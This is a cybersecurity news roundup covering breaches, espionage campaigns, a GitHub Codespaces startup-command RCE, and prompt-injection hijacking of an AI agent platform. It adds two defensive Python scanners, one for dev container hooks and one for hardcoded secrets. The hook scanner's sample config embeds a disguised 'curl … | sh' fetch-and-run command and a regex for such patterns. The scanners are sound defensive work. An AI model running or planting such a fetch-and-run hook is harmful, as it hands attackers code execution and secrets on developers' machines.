In today’s cybersecurity news…
Substack admits data breach
Substack is notifying users of a data breach after attackers accessed email addresses, phone numbers, and internal metadata back in October. Substack CEO Chris Best said the issue was only discovered this week, and there’s no evidence that passwords or financial data were accessed. A threat actor has since posted a database with about 697,000 records online. Substack says it’s fixed the flaw and is warning users about potential phishing. (BleepingComputer)
Russian attacks target Winter Olympics
Italy’s foreign minister says cyberattacks “of Russian origin” have targeted foreign ministry sites and infrastructure linked to the Milano Cortina Winter Olympics, including hotels, though officials say the attacks were blocked. No details were given on whether the activity was state-backed. The warning comes as the UK urges organizations not to underestimate pro-Russia hacktivists, and as Cloudflare’s CEO threatens to pull free services for the Games after Italy fined the company €14 million for anti-piracy violations. (The Register)
GitHub Codespaces enable RCE
Orca Security says attackers can achieve remote code execution in GitHub Codespaces by tricking developers into opening a malicious repository or pull request. The researchers found that default configuration files can automatically run commands on startup, letting attackers steal tokens, access secrets, and potentially move laterally across enterprise environments. Orca warns that developers should treat repository-supplied configs as untrusted. (Infosecurity Magazine)
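The practical defender's check for this item is to look at what a repository's dev container config would run before opening it. The following is an added example, not code from the article or from Orca Security. It assumes the standard dev container lifecycle keys (initializeCommand through postAttachCommand) are the ones executed automatically, that devcontainer.json may be JSONC (comments and trailing commas), and that the "risky" heuristics are simple constructed patterns; the sample config is constructed.

```python
"""Added example (not from the article or from Orca Security): list the
lifecycle hooks in a repository-supplied devcontainer.json before opening it.

Assumptions: the dev container spec's lifecycle keys below run automatically
when a Codespace is created or started; devcontainer.json may be JSONC
(comments, trailing commas). The sample config is constructed."""
from __future__ import annotations

import json
import re

# Keys the dev container tooling executes without further user action.
LIFECYCLE_KEYS = (
    "initializeCommand",
    "onCreateCommand",
    "updateContentCommand",
    "postCreateCommand",
    "postStartCommand",
    "postAttachCommand",
)

# Constructed heuristics for commands worth a human look: remote fetches,
# piping into a shell, or decoding an opaque payload.
RISKY = re.compile(r"\b(curl|wget)\b|\|\s*(ba|z)?sh\b|base64\s+(-d|--decode)\b")


def strip_jsonc(text: str) -> str:
    """Remove // and /* */ comments outside strings, then trailing commas."""
    out, i, n, in_str = [], 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:      # keep escaped char verbatim
                out.append(text[i + 1])
                i += 2
                continue
            if c == '"':
                in_str = False
            i += 1
        elif c == '"':
            in_str = True
            out.append(c)
            i += 1
        elif text.startswith("//", i):        # line comment: skip to newline
            j = text.find("\n", i)
            i = n if j < 0 else j
        elif text.startswith("/*", i):        # block comment: skip past */
            j = text.find("*/", i + 2)
            i = n if j < 0 else j + 2
        else:
            out.append(c)
            i += 1
    # Trailing commas before } or ] (applied only after comments are gone).
    return re.sub(r",(\s*[}\]])", r"\1", "".join(out))


def flatten_command(value) -> list[str]:
    """A hook may be a string, an argv list, or a dict of named parallel commands."""
    if isinstance(value, str):
        return [value]
    if isinstance(value, list):
        return [" ".join(str(v) for v in value)]
    if isinstance(value, dict):
        cmds: list[str] = []
        for v in value.values():
            cmds.extend(flatten_command(v))
        return cmds
    return [repr(value)]


def find_auto_exec_hooks(config_text: str) -> dict[str, list[str]]:
    """Return {lifecycle_key: [command, ...]} for every hook present in the config."""
    cfg = json.loads(strip_jsonc(config_text))
    return {k: flatten_command(cfg[k]) for k in LIFECYCLE_KEYS if k in cfg}


def flag_risky(hooks: dict[str, list[str]]) -> list[tuple[str, str]]:
    """Pick out hook commands that match the RISKY heuristics."""
    return [(k, cmd) for k, cmds in hooks.items() for cmd in cmds if RISKY.search(cmd)]


# Constructed sample: looks like an ordinary Node project config.
SAMPLE_DEVCONTAINER = """{
  // constructed sample, not a real repository
  "name": "node-app",
  "image": "mcr.microsoft.com/devcontainers/javascript-node:20",
  "postCreateCommand": "npm install",
  "postStartCommand": {
    "lint": ["npm", "run", "lint"],
    "telemetry": "curl -s https://example.invalid/init.sh | sh"  /* fetch-and-run */
  },
}"""

if __name__ == "__main__":
    hooks = find_auto_exec_hooks(SAMPLE_DEVCONTAINER)
    for key, cmds in hooks.items():
        for cmd in cmds:
            print(f"{key}: {cmd}")
    for key, cmd in flag_risky(hooks):
        print(f"REVIEW BEFORE OPENING -> {key}: {cmd}")
```

The heuristics are deliberately coarse: the point is to surface every command the container would run on its own, so a reviewer reads them, rather than to decide automatically that a config is safe.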
Russia-used Starlink terminals now deactivated
Ukraine says its new Starlink whitelist system is now stopping Russian military use of the satellite internet network and has already cut off access for unverified terminals, following yesterday’s move to disconnect unauthorized devices. Approved terminals on the whitelist are operational, but Russian ones have been blocked, and verified lists are being updated daily as part of the ongoing registration process. (Reuters)
Huge thanks to our sponsor, Strike48

Cyberespionage op targets governments worldwide
Palo Alto Networks’ Unit 42 says an Asia-based cyberespionage group breached at least 37 governments and conducted reconnaissance in 155 countries, calling it one of the most widespread state-linked compromises since SolarWinds. Telecom firms, police, ministries, and even a parliament were accessed. Researchers say the campaign focused on espionage and data theft, using phishing and common tools like Cobalt Strike across varied targets. (The Record)
Conpet discloses cyberattack
Romania’s national oil pipeline operator Conpet says a cyberattack disrupted its corporate IT systems and knocked its website offline, but didn’t affect operational technology or fuel transport. The company runs nearly 4,000 kilometers of pipelines. The Qilin ransomware group claims responsibility, saying it stole about 1TB of data and leaked sample documents as proof. (BleepingComputer)
OpenClaw may expose sensitive personal data
The OpenClaw AI agent platform may be vulnerable to prompt-injection attacks that could let hackers backdoor a user’s machine, steal files, or deploy ransomware. Snyk found that 283 of around 4,000 skills in the ClawHub marketplace exposed sensitive data like API keys, passwords, and credit card numbers. Zenity also reported that attackers could use indirect prompt injection through integrated apps to gain remote control of systems and exfiltrate data. (The Register)
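Whatever the platform, the finding that a quarter-thousand marketplace skills carried live credentials argues for scanning a skill's files for secrets before installing it. Below is an added example of such a pre-install check; it is not code from the article, Snyk or Zenity. The detection patterns are constructed heuristics rather than any vendor's rule set; the AWS access-key-ID shape (AKIA followed by 16 uppercase alphanumerics) and the Luhn check for card numbers are standard, the sample key is AWS's own documented example value, and the sample skill text is constructed.

```python
"""Added example (not from the article, Snyk or Zenity): scan a skill's text
for hardcoded secrets before installing it.

Assumptions: the patterns are constructed heuristics; the AWS key-ID shape and
the Luhn check are standard; the sample skill file is constructed."""
from __future__ import annotations

import re

PATTERNS = {
    # AWS access key ID shape (AKIA + 16 uppercase alphanumerics).
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    # Generic "name = value" assignments of credential-like names; group 2 is the value.
    "credential_assignment": re.compile(
        r"(?i)\b(password|passwd|secret|api[_-]?key|token)\b\s*[:=]\s*['\"]?([^\s'\"]{8,})"
    ),
}

# 13 to 19 digits, optionally separated by spaces or dashes; confirmed with Luhn.
CARD_CANDIDATE = re.compile(r"\b\d(?:[ -]?\d){12,18}\b")


def luhn_valid(digits: str) -> bool:
    """Standard Luhn checksum; filters out ordinary long numbers (IDs, timestamps)."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def scan_for_secrets(text: str) -> list[tuple[int, str, str]]:
    """Return (line_no, kind, matched_value) for every finding, in file order."""
    findings: list[tuple[int, str, str]] = []
    for no, line in enumerate(text.splitlines(), start=1):
        for kind, rx in PATTERNS.items():
            for m in rx.finditer(line):
                # Report the captured value when the pattern has groups, else the match.
                value = m.group(m.lastindex) if m.lastindex else m.group(0)
                findings.append((no, kind, value))
        for m in CARD_CANDIDATE.finditer(line):
            digits = re.sub(r"[ -]", "", m.group(0))
            if luhn_valid(digits):
                findings.append((no, "payment_card", digits))
    return findings


# Constructed skill file: one benign long number, three embedded secrets.
SAMPLE_SKILL = """# constructed skill file, not from ClawHub
name = "weather-lookup"
timeout = 30
order_id = 1234567890123456
API_KEY = "sk_constructed_example_0123"
aws_access_key_id = "AKIAIOSFODNN7EXAMPLE"
card = "4111 1111 1111 1111"
"""

if __name__ == "__main__":
    for line_no, kind, value in scan_for_secrets(SAMPLE_SKILL):
        print(f"line {line_no}: {kind}: {value}")
```

The Luhn step matters for the false-positive rate: `order_id` on line 4 is a 16-digit number that fails the checksum and is not reported, while the line 7 value passes and is.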
EnCase driver weaponized
Huntress researchers say attackers are abusing an old, revoked Windows driver from the EnCase forensic tool to disable security software in “bring-your-own-vulnerable-driver” attacks. The team found Windows still loads the driver because of legacy signing rules that allow pre-2015 certificates, even if they’re expired or revoked. (Dark Reading)